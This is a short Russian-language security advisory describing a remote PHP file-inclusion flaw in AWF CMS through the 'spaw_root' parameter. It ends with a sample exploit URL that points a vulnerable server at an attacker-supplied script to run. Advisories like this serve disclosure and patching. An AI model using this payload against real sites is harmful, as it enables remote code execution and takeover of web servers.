Программа: AWF CMS 1.11, 2.1.4. Возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "spaw_root" в сценарии spaw/spaw_control.class.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена.

Пример:

http://example/[ac_path]/spaw/spaw_control.class.php?spaw_root=[cmd_url]/



Оставить мнение